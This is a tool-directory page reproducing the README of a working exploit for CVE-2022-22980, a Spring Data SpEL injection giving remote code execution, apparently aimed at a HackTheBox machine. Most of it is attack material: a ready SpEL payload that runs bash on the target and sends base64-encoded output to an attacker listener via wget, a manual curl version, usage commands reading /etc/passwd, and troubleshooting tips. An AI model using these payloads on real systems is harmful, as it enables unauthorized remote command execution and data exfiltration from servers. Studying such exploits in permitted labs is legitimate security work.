Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2022-22980 — Exploitation de CVE-2022-22980 | Kitploit
Tools/GitHubGitHub/eliasdekiniweek/cve-2022-22980
Payload GenerationExploitationWeb Application ExploitationCTFCommand and ControlLearning & Education
GitHubeliasdekiniweek/cve-2022-22980

CVE-2022-22980

Exploitation de CVE-2022-22980

View Repository
1107 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

SpEL RCE Exploit - CVE-2022-22980

Exploit for remote code execution (RCE) on Spring Data via SpEL injection (Spring Expression Language).

Descriptions

Vulnerability

The box exposes an endpoint /search that accepts a tracking_id parameter vulnerable to SpEL injection. This injection allows the execution of malicious Java expressions directly on the server.

Exploitation Principle

  1. Inject a SpEL expression that executes a shell command via Runtime.getRuntime().exec()
  2. Encode the command output in base64
  3. Exfiltrate the result via an HTTP GET request to a controlled listener
  4. Decode and display the result

Usage

Prerequisites

  • Python 3.x with standard modules (http.server, subprocess, threading, base64)
  • curl on your local machine
  • wget on the target machine (for exfiltration)
  • A port 80 available (or modify LPORT in the script)
  • Network access to the target

Configuration

Modify the parameters in the script according to your environment:

TARGET = "http://<IP_CIBLE>:8080/search"   # URL de la cible
LHOST = "<VOTRE_IP>"                        # IP locale (tun0 pour HTB)
LPORT = 80                                  # Port d'écoute

Execution

# Commande simple
python3 spel_shell.py "whoami"

# Commande avec pipe
python3 spel_shell.py "cat /etc/passwd"

# Énumération système
python3 spel_shell.py "uname -a"

# Vérifier l'accès réseau
python3 spel_shell.py "curl -s http://httpbin.org/get"

Example Output

[*] Starting listener...
[*] Server listening on port 80
[*] Sending payload...
Payload: tracking_id=T(java.lang.Runtime).getRuntime().exec(new String[]{"bash","-c","whoami | base64 -w0 | xargs -I {} wget http://10.10.14.5:80/{}"})
[*] Received data: cm9vdA==

[+] Command output:

root

Manual Payload (Reference)

If you want to test the payload without the script:

# Terminal 1 : Démarrer le listener
python3 -m http.server 80

# Terminal 2 : Envoyer la payload
curl -X POST \
  -d 'tracking_id=T(java.lang.Runtime).getRuntime().exec(new String[]{"bash","-c","whoami | base64 -w0 | xargs -I {} wget http://<VOTRE_IP>:80/{}"})' \
  http://<IP_CIBLE>:8080/search

Troubleshooting

Error: "Address already in use"

Port 80 is busy. Solutions:

# Vérifier quel processus utilise le port
sudo netstat -tlnp | grep :80

# Arrêter Apache si actif
sudo systemctl stop apache2

# Ou utiliser un autre port
# Modifiez LPORT dans le script et testez

No response received

  1. Check network connectivity: Ensure the target can reach your LHOST:LPORT
  2. Test with a simple command: python3 spel_shell.py "echo test"
  3. Check port permissions: Port 80 requires sudo on Linux
  4. Check LHOST IP: Use ifconfig (tun0 for HTB) and not 127.0.0.1

Base64 decoding error

If you see "Raw data received" instead of "Command output", the command may not have produced valid output. Test a command that always produces output.

Script Architecture

1. start_server() - Lance un serveur HTTP sur le port 80
                   ↓
2. Envoie la payload SpEL via curl vers la cible
                   ↓
3. La cible exécute la commande et encode le résultat en base64
                   ↓
4. wget envoie le résultat vers le listener (GET http://LHOST:LPORT/<data>)
                   ↓
5. Le Handler reçoit la data et la stocke
                   ↓
6. Le script décode et affiche le résultat

Disclaimer

This script is provided for educational purposes for HackTheBox boxes. Use it only on environments you have permission to test.


Author: Eliasdekiniweek Date: February 2026 Language: Python 3

Download Tool